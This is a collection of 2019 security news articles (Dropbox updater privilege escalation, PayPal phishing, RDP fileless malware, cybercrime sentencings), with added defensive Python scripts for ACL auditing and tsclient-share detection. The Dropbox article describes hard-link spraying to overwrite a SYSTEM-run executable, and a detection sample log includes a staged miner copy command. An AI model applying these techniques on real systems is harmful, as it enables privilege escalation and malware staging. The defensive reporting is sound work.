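                              listening, unicorn)
    if unicorn:
        return RiskAssessment("HIGH", "SSL/DTLS listeners and a running Unicorn process on an unfixed or unverified release",
                              listening, unicorn)
    return RiskAssessment("MEDIUM", "SSL/DTLS listeners on an unfixed or unverified release; Unicorn not running now",
                          listening, unicorn)


if __name__ == "__main__":
    RUNNING_VERSION = "9.8(2)12"   # placeholder: read from 'show version'
    FIRST_FIXED = "9.8(2)20"       # placeholder: take from the Cisco advisory for this train
    result = assess(SAMPLE_SOCKETS, SAMPLE_PROCESSES, RUNNING_VERSION, FIRST_FIXED)
    print(result.level, "-", result.reason)
```

Feed the script the saved output of the two commands from each appliance; a MEDIUM result still warrants verifying the release against the advisory, because the Unicorn process may simply not have been running at the time of the check.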

Biasini warns that despite not being a new vulnerability, it still poses a real risk for denial of service and unauthenticated information disclosure as attacks are increasing.

With holidays around the corner, companies have less staff on duty and adversaries are likely to take advantage.

"Customers should validate if they are vulnerable as soon as possible and plan the appropriate patching/mitigations strategies as necessary to minimize both risk and impact to the organization," Biasini advises.


Dropbox Zero-Day Vulnerability Gets Temporary Fix
22.12.2019 
Bleepingcomputer  Vulnerebility

A zero-day vulnerability exists in Dropbox for Windows that allows attackers to gain permissions reserved for SYSTEM, the most privileged account on the operating system.

The unpatched security flaw affects standard Dropbox installations. It relates to the updater that runs as a service and is responsible for keeping the application up to date.

Dropbox has yet to release a version that patches the flaw, but a temporary solution is freely available in the form of a micropatch.

Short-term fix
Security researchers Decoder and Chris Danieli discovered the vulnerability and created proof-of-concept exploit code to validate their findings.

They say that they informed Dropbox of the issue on September 18 and allowed a 90-day period before public disclosure. The company responded that the problem was known and that a fix would become available before the end of October.

Until Dropbox rolls out a fixed version, an interim solution can be applied via 0patch, a platform that delivers micropatches for known issues before a permanent, official fix becomes available.

Describing the issue on Twitter, Mitja Kolsek, CEO of Acros Security, the company behind 0patch, says that a local low-privileged attacker can use it to replace an executable run by a process with SYSTEM-level rights.

“While analyzing the issue, we decided that the most reliable fix would be to simply cut off the log-writing code from DropBox Updater. This doesn't seem to negatively impact either DropBox functionality or the update process - it just leaves the log file empty, potentially making it harder for DropBox to troubleshoot issues on user's computer. (Clearly, not being vulnerable trumps that.)” - Mitja Kolsek

These tiny pieces of code correct only the vulnerable part and are applied in memory while the system is running, so they work without a reboot.

Kolsek was able to create the Dropbox patch faster with the help of CERT/CC vulnerability analyst Will Dormann, who provided technical clarifications and proof-of-concept code that showed how the bug could be exploited.

Technical details, no PoC
In a blog post this week, Decoder offers details for leveraging the vulnerability to elevate privileges on an already compromised host. The exploit code is not provided, since the purpose of the disclosure is to “share knowledge, not tools.”

The researcher says that they tested the privilege escalation vulnerability on version 87.4.138 of the software, the latest release at the time of writing.

The exploitation technique takes advantage of the Dropbox updater, which is installed as a service with two scheduled tasks that run with SYSTEM permissions.

The two researchers found that the ‘dropboxupdate’ service writes the log files to ‘C:\ProgramData\Dropbox\Update\Log’ where standard users are also allowed to add, overwrite, and delete files.

Furthermore, the SYSTEM account makes a SetSecurity call on the files in this location, which opens the door to exploitation via hard links.

One of the challenges the researchers had to overcome was finding a log file name that the updater process would actually use.

“But we have a problem here, we have to “guess” the logfile name, that is the exact time (including milliseconds) and the PID of the updater process” - Decoder

The solution was to cause the update process to hang and perform hard link spraying: creating 999 links that follow the expected naming convention, all pointing to the target file. Testing tools developed by James Forshaw of Google Project Zero helped in this endeavor.

A test on the Windows license agreement file, license.rtf in System32, proved that the method works and allows overwriting files controlled by the SYSTEM account.


After more poking around, the researchers also found a way to gain a shell with SYSTEM privileges: logging off and back on after overwriting DropboxCrashHandler.Exe with a malicious executable.

A video proving the success of this method is available below:

Local access is a prerequisite for exploiting this bug; nevertheless, compromising a computer is not difficult, and a privilege escalation bug allows an attack to move past the initial stage.

Fixing the vulnerability requires restricting the permissions a normal user has on the Log folder in ProgramData. Dormann says that the number of privilege escalation vulnerabilities on Windows has increased lately.

An explanation came from Kolsek, who points out that the likely cause is the default permissions on the ProgramData directory.

It's all about *explicitly* setting permissions. Program Files is secure by default through inheritance. ProgramData is not.

— Will Dormann (@wdormann) December 19, 2019
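The point made above, that ProgramData is not locked down by inheritance the way Program Files is, can be checked on any directory an updater or service writes to. The following is an added example, not code from the researchers, 0patch or Dropbox: it parses the output of Windows' built-in icacls tool for the log directory named in the article and flags entries that let broad principals (Everyone, Users, Authenticated Users) create or replace files there. The icacls output is constructed for the example and assumes the directory simply inherited the typical default ProgramData layout; the principal list and rights set are this example's own choices.

```python
import re
from typing import Dict, List, Tuple

# Directory from the article. The icacls output below is constructed for this
# example and reproduces the typical inherited layout of C:\ProgramData: Users
# read everywhere and, through the (CI)(WD,AD,...) entry, may create files and
# subfolders in any directory that inherits from it.
LOG_DIR = r"C:\ProgramData\Dropbox\Update\Log"
SAMPLE_ICACLS = r"""C:\ProgramData\Dropbox\Update\Log NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                  BUILTIN\Administrators:(I)(OI)(CI)(F)
                                  BUILTIN\Users:(I)(OI)(CI)(RX)
                                  BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
                                  CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every interactive low-privileged user belongs to (example's choice).
BROAD_PRINCIPALS = {
    "Everyone",
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls rights that allow adding, replacing or deleting entries in a directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "D", "WDAC", "WO", "GA", "GW"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str], List[str]]]:
    """Parse icacls output into (principal, inheritance flags, rights) tuples.
    The first line carries the path before the first ACE; later ACE lines are
    indented. Deny entries are skipped because they restrict rather than grant."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the trailing summary line
        tokens = [t for group in re.findall(r"\(([^)]*)\)", m.group("flags"))
                  for t in group.split(",")]
        if "DENY" in tokens:
            continue
        inherit = [t for t in tokens if t in INHERITANCE_FLAGS]
        rights = [t for t in tokens if t not in INHERITANCE_FLAGS]
        entries.append((m.group("principal").strip(), inherit, rights))
    return entries


def find_weak_entries(entries) -> List[Tuple[str, List[str]]]:
    """Return (principal, rights) for broad principals that hold write rights."""
    return [(principal, rights) for principal, _inherit, rights in entries
            if principal in BROAD_PRINCIPALS and WRITE_RIGHTS & set(rights)]


def audit(output: str, path: str) -> Dict[str, object]:
    """Summarise one directory: how many ACEs were parsed and which are weak."""
    entries = parse_icacls(output, path)
    weak = find_weak_entries(entries)
    return {"path": path, "entries": len(entries), "weak": weak, "writable_by_users": bool(weak)}


if __name__ == "__main__":
    # On a real host: icacls "C:\ProgramData\Dropbox\Update\Log" > acl.txt, then pass the file contents.
    report = audit(SAMPLE_ICACLS, LOG_DIR)
    print(report["path"], "writable by standard users:", report["writable_by_users"])
    for principal, rights in report["weak"]:
        print("  ", principal, ",".join(rights))
```

A directory that a SYSTEM service writes to should show no weak entries; when the audit flags one, the fix is what the article describes, an explicit ACL on that folder instead of the inherited ProgramData defaults.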


PayPal Phishing Attack Promises to Secure Accounts, Steals Everything
22.12.2019 
Bleepingcomputer  Phishing

An ongoing phishing campaign is targeting PayPal customers with emails disguised as 'unusual activity' alerts warning of suspicious logins from unknown devices, in an attempt to squeeze them dry of all their credentials and financial info.

As the ESET researchers that spotted these attacks discovered, the phishers are attempting "to trick users into handing over considerably more than ‘only’ their access credentials to the payment service."

To make sure that potential victims are scared straight and more than willing to click the link embedded in the phishing message, the attackers say that their accounts are limited until they're secured by confirming their identity.

"Please log in to your PayPal account and complete the steps to confirm your identity. To help protect your account, your account will remain limited until you complete the necessary steps," the phishing bait emails say.

"The security of your PayPal account is a top priority for us and we want to work together to help protect it."

Phishing email sample (ESET)
Victims squeezed out one step at a time
After the target lands on the PayPal-branded phishing site, the phishers again remind them that they need to prevent unauthorized access to secure their accounts, asking them to confirm their 'informations' by entering a CAPTCHA code displayed on the page.

"The manufactured sense of urgency is not the only telltale sign to tip you off that something is amiss," ESET's researchers explain. "Other giveaways include the odd URL (though partly obfuscated here for security reasons), substandard English, chopped-off letters, and the use of a CAPTCHA."

In the next step, the victims are taken to a series of fake login pages designed to harvest their PayPal usernames and passwords, but the data collection process doesn't end here.

After hitting the login button, the phishing chain continues with a page that requires the victims to verify their accounts by updating their information if they want the "limits" removed and their accounts fully restored.

Account verification phishing page (ESET)
In the next few steps, the victims are asked to fill out their billing addresses (including their name, phone number, and date of birth), as well as their credit and debit card data, supposedly to avoid having to fill it out again later while using PayPal.

To make sure that they don't collect useless information, the attackers also require the victims to confirm their credit and debit card info by entering their account numbers, the security code on the back of the card, and their mother's maiden name.

In the last step, the password for their e-mail account is also requested so that the attackers can access other accounts in the future — however, they do promise not to use the password.

SSL secured phishing landing pages
Once the campaign's operators have squeezed the last piece of sensitive info out of their victims, they send them to a page designed to ease their minds by congratulating them for restoring access to their accounts and assuring them that their "accounts will be verified in the next 24 hours."

PayPal account restored, everything else stolen (ESET)
Throughout the campaign, the attackers used multiple phishing domains with names designed to somewhat resemble an official PayPal site.

All the phishing sites were served over HTTPS, displaying a green padlock to increase the targets' trust and lend the pages a semblance of legitimacy.

As the researchers further found, one of the domains was registered through Namecheap on December 5, with the registrant info protected by WhoisGuard and a Cloudflare SSL certificate valid from December 4, 2019, to October 9, 2020.

Phishing domain SSL certificate and Whois info (ESET)
"It’s worth noting that we’ve found no evidence that this campaign results in the installation of malicious software on victims’ machines," ESET adds.

"And, as this scam starts with a phishing email, the usual precautions will go a long way towards helping you stay safe."

How to avoid getting phished
The researchers recommend checking the URL of the website you land on after clicking a link you were sent via email and, if possible, refraining from clicking any links or opening any attachments you received in your inbox.

The safest approach is to type the site's address manually into the web browser or use a previously created bookmark, to avoid being redirected to sites designed to collect your info or infect your computer with malware.

PayPal also provides a series of recommendations on how to spot phishing e-mails on its Help Center site, advising users not to reply to such emails, click any embedded links, or download and open attachments.

PayPal lists the following signs you can look for to identify phishing messages more easily:

• Impersonal, generic greetings are used; such as “Dear user” or “Dear [your email address]”
• Ask you to click on links that take you to a fake website
• Contain unknown attachments
• Convey a false sense of urgency
• "Your account is about to be suspended," "You've been paid," or "You have been paid too much" warnings
Customers who spot a phishing message in their inbox posing as an official email from PayPal are asked to report it as soon as possible by forwarding it to spoof@paypal.com and then deleting it.


How to Place Calls From Windows 10 Using the Your Phone App
22.12.2019 
Bleepingcomputer  Apple

Microsoft's Your Phone is a Windows 10 app that lets you see your Android phone's notifications, photos, and messages on your desktop. It also comes with the handy ability to mirror Android apps to your Windows 10 device.

In the latest Your Phone update, Microsoft has introduced a new feature that lets you place and receive phone calls from your Android device within Windows 10.

Once configured, you'll be able to enjoy a complete phone calling experience on your desktop, including accessing the phonebook, searching your contacts, viewing your call history and placing calls from your desktop.

To do this, you will need to pair your Android smartphone with Windows 10 via Bluetooth and connect both devices to the internet.

How to place and receive calls on Windows 10
Download and install Your Phone from the Microsoft Store.
Launch the Your Phone app and click Get Started.
Sign in with your Microsoft account and click 'Continue'.
To link your phone, download Your Phone Companion app from the Play Store.
Sign in with the same Microsoft account.
Follow the on-screen instructions to finish the process.
Once you have connected your Android device to the Your Phone app, you'll be able to access the phone calling experience by clicking on the 'Calls' option on the right side of the application.

To establish a connection for calling, make sure Bluetooth is enabled on both devices and Focus Assist is turned off on Windows 10.

Your Phone

Once your devices are synced up, you can see the call history and a dial pad. You can now send and receive calls and send voice notes as well.

We tried out the feature on the Windows 10 November 2019 Update with an Android 9-powered smartphone, and the results were surprisingly good.



Apple Blackmailed for $100K in iTunes Cards to Avoid 'Data Leak'
22.12.2019 
Bleepingcomputer  Apple

22-year-old Londoner Kerem Albayrak was sentenced today after attempting to blackmail Apple by threatening to factory reset 319 million iCloud accounts and sell the users' data.

Albayrak pleaded guilty to one count of blackmail and "two counts of unauthorized acts with intent to impair the operation of or prevent/hinder access to a computer" on December 2.

Today, at Southwark Crown Court, he got a second chance: he was sentenced to a two-year suspended jail term, a six-month electronic curfew, and 300 hours of unpaid community work.

When asked about some of his activities, Albayrak told NCA investigators “once you get sucked into it [cyber crime], it just escalates and it makes it interesting when it’s illegal.” The fame-hungry cyber-criminal went on to say “when you have power on the internet it’s like fame and everyone respects you, and everyone is chasing that right now.” - National Crime Agency (NCA)

Blackmailing Apple
Albayrak demanded a ransom of a thousand $100 iTunes gift cards or $75,000 in cryptocurrency from Apple via email on March 12, 2017.

"A week later Albayrak filmed himself accessing two apparently random iCloud accounts," the NCA said in a press release published today.

"He posted the video on YouTube and sent the link to Apple security, as well as multiple media outlets. Two days later the demand increased to $100,000 and a threat to factory reset every iCloud account in his possession."

After Apple reached out to UK and US law enforcement agencies, the NCA's National Cyber Crime Unit found and arrested the man at his home in Hornsey, North London.

"Hello Apple I've decided to use all my servers and macroscripts on these accounts," he told Apple in one of his emails, according to a DailyMail report. "If I don't get by payment by 3 December I will be hacking every iCloud account I have extracting all the notes and dumping them online."

Hacker who tried to blackmail Apple by threatening to delete 319 million accounts has been sentenced following an NCA investigation.

Read more https://t.co/PcnX2iM7Wo pic.twitter.com/wlCJMCRJJr

— National Crime Agency (NCA) (@NCA_UK) December 20, 2019
The investigators also seized electronic equipment, including computers, a phone, and a hard drive, which allowed them to discover that Albayrak claimed to be the spokesperson of a hacker group named "Turkish Crime Family."

NCA's investigation also showed that the young Londoner did not possess the data he claimed to have; instead, he was flaunting credentials leaked from other online services that were mostly inactive.

"Albayrak wrongly believed he could escape justice after hacking into two accounts and attempting to blackmail a large multi-national corporation," NCA Senior Investigative Officer Anna Smith said.

"During the investigation, it became clear that he was seeking fame and fortune. But cyber-crime doesn’t pay," she added.



GozNym Gang Members Behind $100 Million Damages Sentenced
22.12.2019 
Bleepingcomputer  CyberCrime

Three members of a cybercrime group that used the GozNym banking Trojan to steal millions from U.S. businesses were sentenced today in parallel and multi-national prosecutions in Pittsburgh and Tbilisi, Georgia.

The GozNym group members were charged for stealing "an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions" according to a Europol press release from May.

In all, ten members of the GozNym cybercriminal group were indicted in May, five of them arrested at the time, while five other Russian nationals charged in the indictment — including the developer behind the GozNym malware — remain on the run.

The indictment unsealed in Pittsburgh, USA, in May, charged GozNym members for conspiring to:

infect victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
use the captured login credentials to fraudulently gain unauthorized access to victims’ online bank accounts;
steal money from victims' bank accounts and launder those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.
The malware used in the attacks is a "Trojan hybrid spawned from the Nymaim and Gozi ISFB malware," a strain used "in attacks against more than 24 U.S. and Canadian banks" per IBM X-Force Research.

GozNym was delivered to targets' computers via large-scale malspam campaigns targeting hundreds of thousands of individuals and organizations, and it was used to steal banking credentials from the infected systems.

The GozNym banking Trojan payloads and the malicious domains used in the attacks were hosted on the infrastructure of the Avalanche malware distribution network dismantled in 2016 when law enforcement seized, sinkholed, and blocked over 800,000 domains spread over 60 registrars.

Three members of GozNym cybercrime network sentenced in parallel multi-national prosecutions in Pittsburgh and Tbilisi, Georgia. https://t.co/zpAO6wqCof pic.twitter.com/Qz9UyQnG0I

— WDPAnews (@WDPAnews) December 20, 2019
GozNym members' sentences
Bulgarian citizen Krasimir Nikolov was sentenced today in federal court in Pittsburgh "to a period of time served after having served more than 39 months in prison following his conviction on charges of criminal conspiracy, computer fraud, and bank fraud."

His main role in the criminal organization was that of account takeover specialist and casher: he used online banking credentials stolen with the help of GozNym to try to transfer victims' money to attacker-controlled accounts.

"Nikolov will be transferred into U.S. Immigration and Customs Enforcement custody and removed from the United States to Bulgaria," according to the DoJ press release.

Two other GozNym gang members, Alexander Konovolov and Marat Kazandjian (Konovolov's technical admin and main assistant within the GozNym network), were also arrested and prosecuted in Georgia, receiving 7 and 5 years of imprisonment, respectively.

Konovolov (aka NoNe or none_1) was the head of the organization and the one who set up the criminal network and controlled over 41,000 infected computers.

"Konovolov assembled the team of elite cybercriminals charged in the Indictment, in part by recruiting them through underground online criminal forums," the DoJ says.

A.K. (aka none_1) was sentenced to imprisonment for a term of 7 years. Considering the large extent of his cooperation with the investigation, M.K. (aka phant0m) was sentenced to imprisonment for a term of 5 years. He will serve 1 year in prison and after this, he will be on conditional release for 4 years. - Office of the Prosecutor General of Georgia

The Georgian trial was prosecuted with witness testimony from an FBI agent and a computer scientist from the FBI’s Pittsburgh Field Office, and evidence the FBI and U.S. Attorney’s Office obtained as part of their parallel investigation of the case.

"In announcing the prosecution of the GozNym international cybercrime syndicate with our law enforcement partners at Europol in May, I stated that borderless cybercrime necessitates a borderless response," said U. S. Attorney Brady.

"This new paradigm involves unprecedented levels of cooperation with willing and trusted law enforcement partners around the world who share our goals of searching, arresting and prosecuting cyber criminals no matter where they might be."


Tokyo 2020 Staff Warns of Phishing Disguised As Official Emails
22.12.2019 
Bleepingcomputer  Phishing

Tokyo 2020 Summer Olympics staff published a warning today alerting of an ongoing phishing campaign delivering emails designed to look like they're coming from the Tokyo Organizing Committee of the Olympic and Paralympic Games (Tokyo 2020).

Tokyo 2020 is a multi-sport international event scheduled to take place next year from 24 July to 9 August in Tokyo, Japan, with some preliminary competition events starting on 22 July.

"We have recently detected emails disguised to look like they are coming from a Tokyo 2020 staff member," says Tokyo Olympic Organizing Committee's warning message.

"Although the email may look official and legitimate, if you have no reason to receive such an email or if the content is questionable, you should not click on the link or open any attached files."

They also warn that the phishing emails will most likely redirect the recipients to phishing sites or infect their computers with malware if opened.

#Attack #Email #Tokyo2020
They have recently detected emails disguised to look like they are coming from a Tokyo 2020 staff member. pic.twitter.com/qjUGQe0w70

— blackorbird (@blackorbird) December 20, 2019
Olympics phishing attacks planned on the dark web
This is not the first time such attacks against next year's Tokyo 2020 Olympics were on the table, with both American and Japanese recipients being picked as potential targets of a phishing campaign by a hacker group in discussions on the dark web according to a KYODO NEWS report.

"Looking at their dialogue, there is a high possibility that the hacking group is of Chinese origin," Antuit's Japanese branch VP Shuhei Igarashi told the news outlet in September.

"More cyberattacks that target the Tokyo Olympics can be expected as the world focuses on the sporting event," Igarashi added.

The security outfit also said that an attack focused on the United States and Japan was already underway at the time they were observing the hackers' dark web activity.

Tokyo 2020's staff said at the time that they "have been raising public awareness that tickets sales have not started yet" to decrease the possibility of such attacks being successful.

"Assuming phishing scams will occur, we will continue to gather information and give the heads-up," the Tokyo Olympic Organizing Committee also stated.

Cyber-espionage group targets sporting organizations
Microsoft's Threat Intelligence Center also reported in October that significant cyberattacks had targeted and, in some cases, compromised the systems of several anti-doping authorities and sporting organizations around the world starting on September 16, ahead of the Tokyo Summer Games in 2020.

Microsoft attributed the attacks to the STRONTIUM APT group (also tracked as Fancy Bear, Sednit, Sofacy, Sandworm, or APT28), a cyber-espionage group previously connected to a multitude of campaigns targeting governments, including the Democratic National Committee hack ahead of the 2016 U.S. Presidential Election.

"The methods used in the most recent attacks are similar to those routinely used by Strontium to target governments, militaries, think tanks, law firms, human rights organizations, financial firms and universities around the world," Microsoft stated.

The hackers were not successful in all their attacks and it is not yet known how many agencies were hacked, but Microsoft said that it notified customers affected by the attacks and also worked with those asking for help to secure their compromised systems or accounts.


Windows Remote Desktop Services Used for Fileless Malware Attacks
22.12.2019 
Bleepingcomputer  Virus

Threat actors breaching company networks are deploying a cornucopia of malware over the remote desktop protocol (RDP), without leaving a trace on target hosts.

Cryptocurrency miners, info-stealers, and ransomware are executed in RAM using a remote connection, which also serves for exfiltrating useful information from compromised machines.

Exploiting Windows RDS features
The attackers leveraged a feature in Windows Remote Desktop Services that allows a client to share local drives to a Terminal Server with read and write permissions.

These drives appear on the server as a share on a virtual network location called 'tsclient' followed by the letter of the drive and can be mapped locally.

The feature has been around for a long time, and what happens when a user connects to the server and runs an application is well documented.

Access to the resources shared this way is possible through RDP and no trace is left on the client machine's disk as applications execute in memory. When an RDP session terminates, so do associated processes and memory is typically released.

Malware cocktail in network shares
Malware analysts at Bitdefender found that adversaries take advantage of this feature and drop multiple malware of various types along with a component named 'worker.exe' that receives instructions from the attacker.

In use since at least February 2018, 'worker.exe' is an off-the-shelf tool used by multiple threat actors, especially for its reconnaissance capabilities.

Among the details this component can collect from a system are the following:

• System information: architecture, CPU model, number of cores, RAM size, Windows version
• Domain name, privileges of the logged-in user, list of users on the machine
• Local IP address, upload and download speed, public IP information as returned by the ip-score.com service
• Default browser, status of specific ports on the host, checking for running servers listening on their ports, specific entries in the DNS cache (mainly whether the host tried to connect to a certain domain)
• Whether certain processes are running, existence of specific keys and values in the registry

These features are complemented by the ability to take screenshots and to enumerate all connected network shares that are mapped locally.

Apart from this, 'worker.exe' was seen executing at least three separate clipboard stealers (MicroClip, DelphiStealer, and IntelRapid), two ransomware families (Rapid and Rapid 2.0, and Nemty), multiple Monero cryptocurrency miners (all based on XMRig), and, since July 2018, the infamous AZORult info-stealer.

Samples of 'worker.exe' were found in a 'tsclient' network share, and the researchers noticed that they did not connect to a command and control (C2) server for instructions. Instead, they took commands from a text file named 'config.ins' in the same location.

All information collected from the host goes into a .NFO file that is stored in the same location as the configuration file.

This is a convenient way to keep the data off the compromised computer and make the forensic analysis more difficult.

A pretty penny
The purpose of all three clipboard stealers is to determine when the user copies a cryptocurrency wallet address and replace it with one belonging to the attacker.

This way, any outgoing transaction will miss its intended destination and find its way into the cybercriminal's pockets.

Of these three pieces of malware, IntelRapid is more advanced. It can recognize a much larger number of cryptocurrency wallets (Bitcoin, Litecoin, Ethereum, Monero, Bitcoin Cash, Dash, Ripple, Dogecoin, Neo, and ZCash) and replaces them with similar alternatives provided by the attacker.

Using a "complex scoring mechanism," the malware picks replacements that begin or end with the same characters as the victim's address. This is most likely to fool users that are more attentive to the pasted wallet address.

Wallet address replacements starting/ending like the original
Depending on the cryptocurrency, IntelRapid could check in excess of 1,300 addresses to find strings that are similar to the original one from the victim.

From analyzing the replacement addresses, Bitdefender determined that the clipboard stealers were deployed by the same threat actor.

Further investigation into other malicious components indicated a connection with the ransomware families, the cryptocurrency miners, and the AZORult info-stealer sample they analyzed.

The earnings from the clipboard stealers, based on transactions for replacement addresses in a main cluster, amounted to $150,000. The real profit is likely much larger, though, since Monero was not included.

On the same note, other revenue streams have also been left out since they could not be estimated, such as money generated by the cryptocurrency miners or from the ransomware payloads.

Original point of compromise
From their findings, the researchers could not work out how the attacker gained access to the network in the first place or how they managed to plant 'worker.exe' on the 'tsclient' share.

Also a mystery is how the adversary got valid RDP credentials to access a victim host; brute-forcing is one possibility.

It is important to note that professional network intruders that break into the digital perimeter of a company often advertise their access on underground forums.

Cybercriminals interested in any of the targets can pay between a few hundred USD to thousands and more for access, or to have their malware dropped.

This is a typical scenario for ransomware affiliates who many times partner with such access-as-a-service providers to get to large targets that can be asked to pay a higher ransom to have their files decrypted.

Victims across the world
The campaigns observed by Bitdefender are likely not discriminating between the targets that can be compromised. This indicates cybercriminals in the money-making game.

"From our telemetry, these campaigns do not seem to target specific industries, instead trying to reach as many victims as possible" - Bitdefender

Most of the victims are in Brazil, the U.S., and in Romania, the researchers note in a report this week.

As visible from the spread of the victims across the globe, the attacker is not interested in certain victims but cares more if they come in great numbers.

Preventing this type of attack is not difficult and can be done by disabling drive redirection in group policy. The option is available at the following path in the Computer Configuration section of the Group Policy editor:

Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Device and Resource Redirection
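Besides the group policy fix, a defender can look for the behaviour described above in process-creation telemetry. The following is an added example, not Bitdefender's code: it scans constructed Sysmon-style process-creation records (the `Key=Value|Key=Value` line format, the user names and the 'miner.exe' file name are all made up for this example) and flags any process whose image, command line or parent refers to a `\\tsclient\<drive>` share, raising confidence when the 'worker.exe' or 'config.ins' names from the report appear.

```python
import re
from typing import Dict, List, Optional

# UNC path on an RDP-redirected client drive, e.g. \\tsclient\C\tools\worker.exe
TSCLIENT_RE = re.compile(r"\\\\tsclient\\[A-Za-z]\\", re.IGNORECASE)

# File names called out in the Bitdefender report; their presence raises confidence.
KNOWN_NAMES = ("worker.exe", "config.ins")

# Constructed Sysmon-style process-creation records (one per line, fields joined
# by '|'); the paths, users and the 'miner.exe' name are made up for this example.
SAMPLE_LOG = r"""
UtcTime=2019-12-20 10:01:02|Image=C:\Windows\System32\notepad.exe|CommandLine="C:\Windows\System32\notepad.exe"|User=CORP\alice|ParentImage=C:\Windows\explorer.exe
UtcTime=2019-12-20 10:02:15|Image=\\tsclient\C\tools\worker.exe|CommandLine="\\tsclient\C\tools\worker.exe"|User=CORP\alice|ParentImage=C:\Windows\explorer.exe
UtcTime=2019-12-20 10:03:40|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c copy \\tsclient\D\stage\miner.exe C:\Users\alice\AppData\Local\Temp\|User=CORP\alice|ParentImage=\\tsclient\C\tools\worker.exe
UtcTime=2019-12-20 10:05:00|Image=C:\Program Files\Mozilla Firefox\firefox.exe|CommandLine="C:\Program Files\Mozilla Firefox\firefox.exe"|User=CORP\bob|ParentImage=C:\Windows\explorer.exe
"""


def parse_record(line: str) -> Dict[str, str]:
    """Split a 'Key=Value|Key=Value' record into a dict.

    Assumes the '|' separator does not occur inside values; a real collector
    would hand over structured events rather than flat text.
    """
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def inspect_record(rec: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when the process touches the tsclient share, else None."""
    image = rec.get("Image", "")
    cmdline = rec.get("CommandLine", "")
    parent = rec.get("ParentImage", "")
    reasons: List[str] = []
    if TSCLIENT_RE.search(image):
        reasons.append("image executes from tsclient share")
    elif TSCLIENT_RE.search(cmdline):
        reasons.append("command line references tsclient share")
    if TSCLIENT_RE.search(parent):
        reasons.append("parent process runs from tsclient share")
    haystack = f"{image} {cmdline} {parent}".lower()
    for name in KNOWN_NAMES:
        if name in haystack:
            reasons.append(f"known file name: {name}")
    if not reasons:
        return None
    return {
        "time": rec.get("UtcTime", "?"),
        "user": rec.get("User", "?"),
        "image": image,
        "reasons": reasons,
    }


def find_tsclient_executions(log_text: str) -> List[Dict[str, object]]:
    """Inspect every non-empty record and collect the findings in log order."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if line.strip():
            finding = inspect_record(parse_record(line))
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for hit in find_tsclient_executions(SAMPLE_LOG):
        print(hit["time"], hit["user"], hit["image"], "->", "; ".join(hit["reasons"]))
```

Because the binaries never touch the server's disk, process-creation events of this kind are among the few host-side traces of the technique; once drive redirection is disabled by policy, any remaining hit on a tsclient path is worth an immediate look.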


Former IT Employee Jailed for Taking Down Airline Systems
22.12.2019 
Bleepingcomputer  Crime

Scott Burns, a former employee of information and communications technology (ICT) provider Blue Chip was sentenced to 10 months in prison for taking down the computers of British airline Jet2.com Limited (aka Jet2) for over 12 hours.

Jet2 is one of the largest airlines in the United Kingdom and a Dart Group PLC subsidiary, and it has a history spanning over 30 years.

UK National Crime Agency (NCA) officers arrested the 27-year-old man on 8 February 2018, seizing several electronic devices from his home including computers and phones.

Burns pleaded guilty to eight offenses under the Computer Misuse Act in November 2019 and was sentenced yesterday at Leeds Crown court.

An ex-employee has been jailed after admitting to carrying out cyber attacks against Jet2 which took down their computer systems for more than 12 hours.

Read more https://t.co/6xQuvEkvbg pic.twitter.com/p1bQF9qHSS

— National Crime Agency (NCA) (@NCA_UK) December 19, 2019
Jet2 network intrusion
He worked for Blue Chip on the Jet2 account until December 2017, when he moved to another company. However, the disgruntled ex-employee decided to illegally access the Jet2 account twice during January 2018 after leaving the ICT provider.

"After gaining access to the Jet2 network on 18 January, Burns removed a folder which stored all user account details, preventing at least 2,000 members of staff from logging into their network accounts and accessing their emails," UK's National Crime Agency (NCA) says.

Following forensic analysis of his seized computers and by examining the data provided by Dart Group's infrastructure team, the NCA investigators discovered that the former employee had also infiltrated Jet2's network on January 3, in "a scoping exercise, assessing the security of their systems in preparation for his later attack."


Burns also hacked into the email account of the company’s CEO multiple times to check if the airline had any evidence that would incriminate him and what was being discussed regarding the incident within the company.

While still on Jet2's network, he also deleted the detailed logs that could have exposed his activity on Jet2's network in an effort to cover his tracks.

Chat records found on his phone show Burns saying he is “finally sick and tired of BC/Jet2” and he describes leaving Blue Chip as “freeeedom”. On the same phone, he had looked up the prison sentence for network intrusion in the UK on Google. - NCA

"Network intrusion is not a victimless crime. Not only did Burns’s actions have a potential financial impact on Jet2, it caused huge disruption to their staff and technical operations," NCA investigator Jamie Horncastle said.

“These are serious offenses. The evidence secured internally by Dart Group was extremely beneficial to this investigation.

"I would always encourage victims of such attacks to preserve as much evidence as possible in the immediate aftermath – it will assist law enforcement in catching the perpetrator.”


AdwCleaner 8.0.1 Fixes DLL Hijacking Vulnerability
21.12.2019
Bleepingcomputer  Vulnerebility

Malwarebytes has released AdwCleaner 8.0.1 and in addition to various improvements to the tool's scanning engine, it also fixes a DLL hijacking vulnerability.

The AdwCleaner malware and adware cleaning program has had a DLL Hijacking vulnerability in versions older than 8.0.1, which was released yesterday.

For those not familiar with a DLL hijack vulnerability, it is important to give a little background on how DLLs are loaded by programs.

When a program starts it will load various DLLs that it needs to operate. If the developer did not specify the path to the DLL, the program will attempt to load the DLL from the current directory, and if it does not exist, it will check other folders in the user's path.

